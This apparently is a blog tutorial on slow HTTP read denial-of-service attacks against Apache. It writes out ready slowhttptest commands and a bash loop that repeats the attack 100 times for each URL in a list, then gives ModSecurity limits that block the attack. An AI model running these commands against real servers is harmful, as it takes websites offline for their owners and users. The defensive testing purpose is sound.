In Layman term, slow DOS attack on port 80 means filling up an Apache queue with “R” (read request) and “W” (write request).

This will bring down the Apache, stop the attack and your website is back on line.

Let’s start with this,

we need slowhttptest tool to test slow attacks and ModSec to prevent an attack.

1. Slowhttp test installation

  • Download slowhttptest

wget http://slowhttptest.googlecode.com/files/slowhttptest-1.5.tar.gz

  • tar -xzvf slowhttptest-1.5.tar.gz
  • cd slowhttptest-1.5
  • ./configure && make && make install

2. ModSec Installation

Please follow this link to install ModSec,

http://www.tecmint.com/protect-apache-using-mod_security-and-mod_evasive-on-rhel-centos-fedora/

Note ** Do not install Mod_evasive (not Required)

3. Now let’s hit the road by getting the website down, 😉

slowhttptest -c 1000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.example.com.au -p 3

-X : slow HTTP read request

-c 1000 : 1000 connections

-r 200 : 200 connections per second

-w 512 -y 1024 : Initial SYN packet for every connection would have random advertised window size value between 512 and 1024

-n 5 -z 32 : read 32 bytes every 5 seconds

-u : URL (target)

-k 3 :  number of times to repeat same request in the connection

-p 3 : timeout to wait for HTTP response on probe connection, after which server is considered inaccessible, default: 5

and bang, it’s down.

Image

Now. let’s check what was happening on server,

root@bt [~]# service httpd status

Image

No space for new connection 😀 …. isn’t that fun ???

Cons: this tool runs for 240 seconds and get’s timeout after that.

cons??? Not for scrip-tors. :), below script will run for 100 iterations for each URL.

for urls in $(cat /root/url.txt)
do

            for (( i = 1; i <= 100; i++ ))
           do
           /usr/local/bin/slowhttptest -c 1000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u  $urls -p 3
           done
done

There are many options available for slowhttptest which can be explore using -h option.

use it as per your needs 😉

Prevention:

ModSec, (bow). personally I am a big fan of this module.

  • Now, In your httpd.conf file their has to be a line calling ModSec conf file as shown below,

-bash-4.1# cat /etc/httpd/conf/httpd.conf | grep -i modsec

Include “/usr/local/apache/conf/modsec2.conf”

  • Open the file and add below parameter,

SecReadStateLimit 100

SecWriteStateLimit 100

The above parameter will reject requests above 100 as shown in below logs,

[Tue Jan 15 19:34:21 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from xxx.xxx.xxx.xxx – Possible DoS Consumption Attack [Rejected]
[Tue Jan 15 19:34:24 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from xxx.xxx.xxx.xxx – Possible DoS Consumption Attack [Rejected]
[Tue Jan 15 19:34:27 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from xxx.xxx.xxx.xxx – Possible DoS Consumption Attack [Rejected]

and website is working perfectly fine, 😉

and Apache status is shown below when the attack is still ON,

Image

Note **

  • SecReadStateLimit and SecWriteStateLimit  should be set according to two parameters,
ServerLimit
MaxClients
  • ServerLimit and MaxClients should be set according to memory on server

This is it!!!